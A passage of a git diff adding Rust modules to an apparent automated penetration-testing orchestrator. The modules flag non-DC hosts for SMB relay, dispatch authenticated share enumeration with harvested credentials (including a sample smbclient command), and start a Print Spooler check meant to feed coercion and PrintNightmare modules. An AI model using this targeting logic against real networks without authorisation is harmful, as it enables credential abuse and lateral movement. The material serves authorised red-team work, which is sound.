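+//! banner format is an assumption about the `hosts.rs` parser's input):
+//!
+//! ```ignore
+//! fn signing_enforced(smb_banner: &str) -> bool {
+//!     // e.g. "... (signing:True) ..." in a netexec-style SMB banner
+//!     smb_banner.contains("(signing:True)")
+//! }
+//! ```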
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::StateInner;
+
+/// Work item for SMB signing detection.
+struct SmbSigningWork {
+ ip: String,
+ hostname: String,
+ domain: String,
+}
+
+fn collect_smb_signing_work(state: &StateInner) -> Vec<SmbSigningWork> {
+ state
+ .hosts
+ .iter()
+ .filter(|h| {
+            // Non-DC hosts are assumed to have signing disabled: DCs enforce
+            // signing:True, while member servers default to not requiring it.
+            // Note this filter keys on is_dc and hostname only; it does not
+            // itself verify that SMB (port 445) is exposed.
+ !h.is_dc
+ && !h.hostname.is_empty()
+ && !state
+ .discovered_vulnerabilities
+ .contains_key(&format!("smb_signing_{}", h.ip.replace('.', "_")))
+ })
+ .map(|h| {
+ let domain = h
+ .hostname
+ .find('.')
+ .map(|i| h.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ SmbSigningWork {
+ ip: h.ip.clone(),
+ hostname: h.hostname.clone(),
+ domain,
+ }
+ })
+ .collect()
+}
+
+/// Scans discovered hosts for SMB signing disabled (non-DC Windows hosts).
+/// DCs enforce signing; member servers typically do not.
+/// Interval: 30s.
+pub async fn auto_smb_signing_detection(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("smb_signing_disabled") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_smb_signing_work(&state)
+ };
+
+ for item in work {
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("smb_signing_{}", item.ip.replace('.', "_")),
+ vuln_type: "smb_signing_disabled".to_string(),
+ target: item.ip.clone(),
+ discovered_by: "auto_smb_signing_detection".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.ip));
+ d.insert("ip".to_string(), json!(item.ip));
+ if !item.hostname.is_empty() {
+ d.insert("hostname".to_string(), json!(item.hostname));
+ }
+ if !item.domain.is_empty() {
+ d.insert("domain".to_string(), json!(item.domain));
+ }
+ d
+ },
+ recommended_agent: "coercion".to_string(),
+ priority: dispatcher.effective_priority("smb_signing_disabled"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(ip = %item.ip, hostname = %item.hostname, "SMB signing disabled — vulnerability queued for relay");
+ }
+ Ok(false) => {} // already exists
+ Err(e) => {
+ warn!(err = %e, ip = %item.ip, "Failed to publish SMB signing vulnerability")
+ }
+ }
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn vuln_id_format() {
+ let ip = "192.168.58.22";
+ let vuln_id = format!("smb_signing_{}", ip.replace('.', "_"));
+ assert_eq!(vuln_id, "smb_signing_192_168_58_22");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_non_dc_host_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].ip, "192.168.58.22");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_dc_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_empty_hostname_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.22", "", false));
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_already_discovered_vuln_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ // Simulate existing vulnerability
+ state.discovered_vulnerabilities.insert(
+ "smb_signing_192_168_58_22".into(),
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: "smb_signing_192_168_58_22".into(),
+ vuln_type: "smb_signing_disabled".into(),
+ target: "192.168.58.22".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: std::collections::HashMap::new(),
+ recommended_agent: "coercion".into(),
+ priority: 5,
+ },
+ );
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_hosts_mixed_dc_and_member() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local", false));
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.22"));
+ assert!(ips.contains(&"192.168.58.23"));
+ assert!(!ips.contains(&"192.168.58.10"));
+ }
+
+ #[test]
+ fn collect_host_without_fqdn_gets_empty_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.22", "srv01", false));
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[test]
+ fn collect_skips_vuln_keeps_clean() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local", false));
+ // Only 192.168.58.22 has existing vuln
+ state.discovered_vulnerabilities.insert(
+ "smb_signing_192_168_58_22".into(),
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: "smb_signing_192_168_58_22".into(),
+ vuln_type: "smb_signing_disabled".into(),
+ target: "192.168.58.22".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: std::collections::HashMap::new(),
+ recommended_agent: "coercion".into(),
+ priority: 5,
+ },
+ );
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].ip, "192.168.58.23");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/smbclient_enum.rs b/ares-cli/src/orchestrator/automation/smbclient_enum.rs
new file mode 100644
index 00000000..3379d0dc
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/smbclient_enum.rs
@@ -0,0 +1,745 @@
+//! auto_smbclient_enum -- authenticated SMB share listing per host.
+//!
+//! Complements auto_share_enumeration by using authenticated sessions to
+//! discover shares that require credentials. Uses smbclient or netexec
+//! to list shares on all known hosts.
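+//!
+//! A representative command the dispatched worker might run (illustrative;
+//! the worker picks its own tooling and arguments):
+//!
+//! ```text
+//! smbclient -L //192.168.58.22 -U 'CONTOSO/admin%<password>'
+//! ```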
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect SMB enumeration work items from current state.
+///
+/// Pure logic extracted from the async loop so it can be unit-tested
+/// without a Dispatcher or runtime.
+fn collect_smbclient_work(state: &crate::orchestrator::state::StateInner) -> Vec<SmbEnumWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ // Check if host has SMB
+ let has_smb = host.services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ if !has_smb {
+ continue;
+ }
+
+ let dedup_key = format!("smb_auth_enum:{}", host.ip);
+ if state.is_processed(DEDUP_SMBCLIENT_ENUM, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hostname
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_string())
+ .unwrap_or_default();
+
+ // Pick a credential for this domain
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| {
+ !domain.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(SmbEnumWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches authenticated SMB share enumeration per host.
+/// Interval: 45s.
+pub async fn auto_smbclient_enum(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("smbclient_enum") {
+ continue;
+ }
+
+        let work: Vec<SmbEnumWork> = {
+ let state = dispatcher.state.read().await;
+ let items = collect_smbclient_work(&state);
+ if items.is_empty() {
+ continue;
+ }
+ items
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "authenticated_share_enumeration",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("smbclient_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.target_ip,
+ "Authenticated SMB share enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SMBCLIENT_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SMBCLIENT_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.target_ip, "SMB auth enum deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.target_ip, "Failed to dispatch SMB auth enum");
+ }
+ }
+ }
+ }
+}
+
+struct SmbEnumWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::SharedState;
+
+ /// Helper: create a credential for tests.
+ fn make_cred(user: &str, pass: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{user}"),
+ username: user.into(),
+ password: pass.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ /// Helper: create a host with given services.
+ fn make_host(ip: &str, hostname: &str, services: Vec<&str>) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: vec![],
+ services: services.into_iter().map(String::from).collect(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ // ---- collect_smbclient_work tests ----
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_smb_hosts_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "web01.contoso.local",
+ vec!["80/tcp http", "443/tcp https"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_single_host_single_cred() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.10");
+ assert_eq!(work[0].hostname, "dc01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].dedup_key, "smb_auth_enum:192.168.58.10");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_hosts() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.contoso.local",
+ vec!["445/tcp smb", "80/tcp http"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.10"));
+ assert!(ips.contains(&"192.168.58.20"));
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_skips_already_processed() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.20");
+ }
+
+ #[tokio::test]
+ async fn collect_prefers_same_domain_credential() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_cred("con_user", "Con123!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "con_user");
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_any_credential_when_no_domain_match() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fab_user");
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_password_credentials() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "", "contoso.local"));
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_password_falls_back() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fab_user");
+ }
+
+ #[tokio::test]
+ async fn collect_bare_hostname_empty_domain() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "srv01", vec!["445/tcp smb"]));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_cifs_service_detected() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "nas01.contoso.local",
+ vec!["cifs file share"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_domain_matching() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.CONTOSO.LOCAL",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "CONTOSO.LOCAL");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_mixed_smb_and_non_smb_hosts() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds", "88/tcp kerberos"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "web01.contoso.local",
+ vec!["80/tcp http", "443/tcp https"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.30",
+ "sql01.contoso.local",
+ vec!["1433/tcp mssql", "445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.10"));
+ assert!(!ips.contains(&"192.168.58.20"));
+ assert!(ips.contains(&"192.168.58.30"));
+ }
+
+ #[tokio::test]
+ async fn collect_all_deduped_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into());
+ state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.20".into());
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_cross_domain_hosts_get_correct_creds() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "dc02.fabrikam.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("con_admin", "ConPass!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_cred("fab_admin", "FabPass!", "fabrikam.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 2);
+
+ let contoso_work = work
+ .iter()
+ .find(|w| w.target_ip == "192.168.58.10")
+ .unwrap();
+ assert_eq!(contoso_work.credential.username, "con_admin");
+
+ let fabrikam_work = work
+ .iter()
+ .find(|w| w.target_ip == "192.168.58.20")
+ .unwrap();
+ assert_eq!(fabrikam_work.credential.username, "fab_admin");
+ }
+
+ #[tokio::test]
+ async fn collect_only_empty_password_creds_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("user1", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("user2", "", "fabrikam.local"));
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_host_with_empty_services() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", vec![]));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ // ---- original tests ----
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("smb_auth_enum:{}", "192.168.58.10");
+ assert_eq!(key, "smb_auth_enum:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SMBCLIENT_ENUM, "smbclient_enum");
+ }
+
+ #[test]
+ fn smb_service_detection() {
+ let services = [
+ "445/tcp microsoft-ds".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn smb_service_detection_by_name() {
+ let services = ["microsoft-ds smb".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn no_smb_service() {
+ let services = [
+ "3389/tcp ms-wbt-server".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(!has_smb);
+ }
+
+ #[test]
+ fn domain_from_hostname_preserves_case() {
+ // smbclient_enum uses to_string() not to_lowercase() for domain
+ let hostname = "srv01.CONTOSO.LOCAL";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default();
+ assert_eq!(domain, "CONTOSO.LOCAL");
+ }
+
+ #[test]
+ fn smb_service_detection_cifs() {
+ let services = ["cifs share".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "srv01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn smb_enum_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "authenticated_share_enumeration",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "authenticated_share_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["credential"]["username"], "admin");
+ }
+
+ #[test]
+ fn credential_domain_matching_case_insensitive() {
+ let domain = "contoso.local";
+ let cred_domain = "CONTOSO.LOCAL";
+ assert_eq!(cred_domain.to_lowercase(), domain.to_lowercase());
+ }
+
+ #[test]
+ fn credential_domain_matching_empty_skips() {
+ let domain = "".to_string();
+ let cred_domain = "contoso.local";
+ let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+ assert!(!matches);
+ }
+
+ #[test]
+ fn smb_enum_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = SmbEnumWork {
+ dedup_key: "smb_auth_enum:192.168.58.22".into(),
+ target_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+ assert_eq!(work.target_ip, "192.168.58.22");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn empty_services_no_smb() {
+ let services: Vec<String> = vec![];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(!has_smb);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/spooler_check.rs b/ares-cli/src/orchestrator/automation/spooler_check.rs
new file mode 100644
index 00000000..4815cfb2
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/spooler_check.rs
@@ -0,0 +1,376 @@
+//! auto_spooler_check -- detect Print Spooler service on discovered hosts.
+//!
+//! The Print Spooler service (MS-RPRN) is a common coercion vector: if running,
+//! PrinterBug (SpoolSample) can force the machine to authenticate to an attacker
+//! listener. It's also a prerequisite for PrintNightmare (CVE-2021-1675).
+//!
+//! This is a recon bridge: it dispatches a check per host and registers
+//! `spooler_enabled` vulnerabilities that downstream coercion/CVE modules target.
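+//!
+//! Registered finding shape (illustrative values, derived from the vuln
+//! construction below):
+//!   vuln_id:   "spooler_192_168_58_10"  (dots in the IP become underscores)
+//!   vuln_type: "spooler_enabled"
+//!   target:    "192.168.58.10"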
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_spooler_work(state: &StateInner) -> Vec<SpoolerWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ let dedup_key = format!("spooler:{}", host.ip);
+ if state.is_processed(DEDUP_SPOOLER_CHECK, &dedup_key) {
